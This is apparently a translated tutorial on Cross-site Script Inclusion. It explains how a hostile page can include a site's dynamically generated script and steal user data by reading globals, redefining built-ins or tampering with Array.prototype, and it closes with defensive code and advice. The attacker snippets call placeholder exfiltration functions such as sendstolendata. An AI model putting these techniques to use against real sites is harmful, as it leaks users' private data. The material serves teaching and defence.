Dynamic JavaScript
JavaScript code is often generated dynamically on the server side, and during this generation user-related information is written into the script. When such a script is sent to the browser, the client's JavaScript engine executes it immediately. In practice, however, these scripts are frequently included from other pages, and the same-origin policy places no restriction on including a script. A web page controlled by an attacker can therefore include a dynamically generated script as well, observe its execution, and exploit whatever security issues that exposes. Because scripts imported through src share global variables with the page's own scripts, if such a dynamic script contains the user's private data, the attacker can read that data simply by including the script. This technique is also known as Cross-site Script Inclusion (XSSI).
Language features of JavaScript
The harm caused by dynamic JavaScript mainly involves two language features: JavaScript's scoping rules and inheritance through the prototype chain.
Scope issues
I believe many people already have some understanding of scope in JavaScript; if you do not, it is easy to look up. Unlike languages such as Java and C++, which have block-level scope, JavaScript variables declared with var have only function scope. This means the JavaScript engine assigns a scope to each function: a variable defined inside a function is visible only within that function, and this scope is called the local scope. A variable assigned as a global (for example as a property of window) is instead visible to every script running on the page, which is the difference between global scope and local scope that the attacks below rely on.
Prototype chain
In JavaScript, every created function has a prototype property, which is a pointer to an object whose purpose is to hold the properties and methods shared by all instances of a particular type. JavaScript uses the prototype chain as its main inheritance mechanism: the basic idea is that a prototype lets one reference type inherit the properties and methods of another reference type. When a property of an object is accessed, JavaScript first checks whether the object itself contains that property; if it does not, the search continues in the object's prototype, and then up the chain.
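The following block is an added example, not code from the original article, covering both the scope section above and the prototype-chain lookup just described: a simulated dynamic script shows which of its values an including page can see, and a small chain walker reports where a property such as slice is actually found. It uses globalThis so it runs in Node as well as in a browser (where globalThis is window).

```javascript
// Added example (not from the original article): how var scoping and
// prototype-chain lookup decide what an including page can observe.
// globalThis is used so the code runs in Node as well as in a browser (window).

// Simulates a dynamically generated script: one value stays inside the
// function scope, the other is written to a global and becomes visible
// to every script on the same page.
function runDynamicScript() {
  (function () {
    var localSecret = "local-345a8b7c";          // function-scoped: not reachable outside
    globalThis.leakedSecret = "global-9d8e34f5"; // global property: reachable by any script
  })();
  return {
    localVisible: typeof globalThis.localSecret !== "undefined",   // false
    globalVisible: typeof globalThis.leakedSecret !== "undefined", // true
  };
}

// Walks the prototype chain the way the engine does and reports where
// a property is found: the instance itself, Array.prototype, or Object.prototype.
function lookupChain(obj, name) {
  var owners = [["instance", obj], ["Array.prototype", Array.prototype],
                ["Object.prototype", Object.prototype]];
  var depth = 0;
  while (obj !== null) {
    if (Object.prototype.hasOwnProperty.call(obj, name)) {
      var match = owners.find(function (o) { return o[1] === obj; });
      return { found: true, depth: depth, owner: match ? match[0] : "other" };
    }
    obj = Object.getPrototypeOf(obj);
    depth++;
  }
  return { found: false, depth: depth, owner: null };
}

// Demonstrates the three cases for an array literal (constructed sample data).
function prototypeDemo() {
  var arr = ["secret1", "secret2", "secret3"];
  return {
    own: lookupChain(arr, "length"),                // instance, depth 0
    inherited: lookupChain(arr, "slice"),           // Array.prototype, depth 1
    fromObject: lookupChain(arr, "hasOwnProperty"), // Object.prototype, depth 2
  };
}
```

The inherited case is the one the prototype-tampering attack below abuses: arr has no slice of its own, so whoever controls Array.prototype controls what arr.slice() runs.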
Attack method
Because script tags in HTML are not restricted by the same-origin policy, script resources can be included from cross-origin pages. Although a cross-origin page cannot read the source code of such a script directly, once the script is included, the page can observe its execution. If the dynamic script contains the user's private data, this can leak that data.
Global variable-based attacks
When a global variable is created in the imported JavaScript, this global variable can also be accessed by the JavaScript code in the page. Therefore, if a dynamic script assigns the user's privacy data to a global variable, the attacker can access the data through the global variable.
Assume that the JavaScript code in a normal script is as follows:
```javascript
(function() {
  // the identifier was lost in extraction; a property of window is assumed,
  // as the text below describes
  window.secret = "345a8b7c9d8e34f5";
})();
```
As you can see, this script assigns the user's private data to a global variable on the window object.
The code for a malicious site is:
```html
<!-- placeholder URL for the victim site's dynamically generated script -->
<script src="https://vulnerable.example/dynamic.js"></script>
<script>
  var user_data = window.secret; // the global set by the included script
  // send user data to hacker
  sendstolendata(user_data);
</script>
```
When a user visits a page containing the malicious code above, that page reads the user's data through the window object and sends it to the attacker.
Redefine global API attacks
Because of the dynamic nature of JavaScript, many functions can be redefined by an attacker, including JavaScript's built-in ones. If a dynamic script passes private data through a built-in function, the attacker can obtain the user's private data by redefining that function before it is called.
Assume that the JavaScript code in a normal script is as follows:
```javascript
(function() {
  var secret = "345a8b7c9d8e34f5";
  // the built-in called here was lost in extraction; JSON.stringify is assumed
  JSON.stringify(secret);
})();
```
In this code a built-in JavaScript method is called with the secret as its argument, and that method can be replaced by an attacker.
Here is the code from the malicious site:
```html
<script type="text/javascript">
  // redefine the built-in before the dynamic script runs (JSON.stringify assumed)
  JSON.stringify = function (user_data) {
    sendstolendata(user_data);
  };
</script>
<!-- placeholder URL for the victim site's dynamically generated script -->
<script type="text/javascript" src="https://vulnerable.example/dynamic.js"></script>
```
When a user visits this site, the built-in method has already been redefined by the attacker, so when the imported code calls it, the attacker's function runs instead and receives the user's information.
Prototype tampering
As mentioned before, JavaScript is based on prototype chains: when a property of an object is accessed, the interpreter searches up the prototype chain until the property is found. The following code makes the problem clear.
Assume that the JavaScript code in a normal script is as follows:
```javascript
(function() {
  var arr = ["secret1", "secret2", "secret3"];
  var x = arr.slice(); // resolved through the prototype chain to Array.prototype.slice
})();
```
As can be seen from the code, the arr array holds three pieces of user-related private data, and slice() is then called on the arr instance. The arr instance itself does not declare a slice method; the call is resolved through the prototype chain, so no error is reported. The programmer may therefore not realize that the slice() being invoked is not one the instance owns, and code like this can be exploited by an attacker.
Here is the code for the malicious site:
```html
<script type="text/javascript">
  Array.prototype.slice = function() {
    // send data to attacker
    sendToAttackBackend(this);
  };
</script>
<!-- placeholder URL for the victim site's dynamically generated script -->
<script type="text/javascript" src="https://vulnerable.example/dynamic.js"></script>
```
When a user visits the page containing this malicious code, the imported JavaScript executes and calls slice; the lookup reaches the slice that the attacker added to Array.prototype, so the sensitive data is sent to the attacker.
Prevention
When developing a website, it is best to keep code and data separate. Sensitive or important data should be stored in separate files that the browser will not execute as JavaScript. Access to these static resources should also be restricted, so that they can only be retrieved after the user logs in; then an attacker who includes the resource still cannot obtain the data.
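As an added example of the separation just described (not code from the original article, and framework-agnostic), the block below builds a per-user data response as JSON rather than as a script: an unparseable prefix makes the body a syntax error if loaded via script src, nosniff and Cross-Origin-Resource-Policy headers stop the browser from treating it as a script at all, and a same-origin client strips the prefix before parsing. The session shape and the legacy script format are assumptions for the demonstration.

```javascript
// Added example (not from the original article): serve user data as a JSON
// resource that cannot be pulled in with <script src>, instead of embedding
// it in a dynamically generated script.

// Prefix that is a syntax error when parsed as JavaScript, but is trivially
// stripped by a same-origin fetch/XHR client.
var XSSI_PREFIX = ")]}',\n";

// The legacy pattern the article warns about: data embedded in executable code.
function buildLegacyScript(data) {
  return "window.userData = " + JSON.stringify(data) + ";";
}

// Builds the response for an authenticated data request.
// `session` is an assumed shape: { userId, authenticated }.
function buildUserDataResponse(session, data) {
  if (!session || !session.authenticated) {
    // Unauthenticated: no data and no hint about its shape.
    return { status: 401, headers: { "Content-Type": "text/plain" }, body: "" };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json; charset=utf-8",
      "X-Content-Type-Options": "nosniff",        // never executed as a script
      "Cross-Origin-Resource-Policy": "same-origin", // other origins cannot embed it
      "Cache-Control": "no-store",                // per-user data must not be cached
    },
    body: XSSI_PREFIX + JSON.stringify(data),
  };
}

// Same-origin client: strip the prefix and parse the JSON.
function parseProtectedJson(body) {
  if (!body.startsWith(XSSI_PREFIX)) throw new Error("missing XSSI prefix");
  return JSON.parse(body.slice(XSSI_PREFIX.length));
}

// Would this body parse as JavaScript if a third party included it as a script?
// new Function only parses the text; nothing is executed.
function executesAsScript(body) {
  try { new Function(body); return true; } catch (e) { return false; }
}
```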
Summary
That covers the harm caused by dynamic JavaScript. I hope this article is useful to you in your study or work. If you have any questions, feel free to leave a message.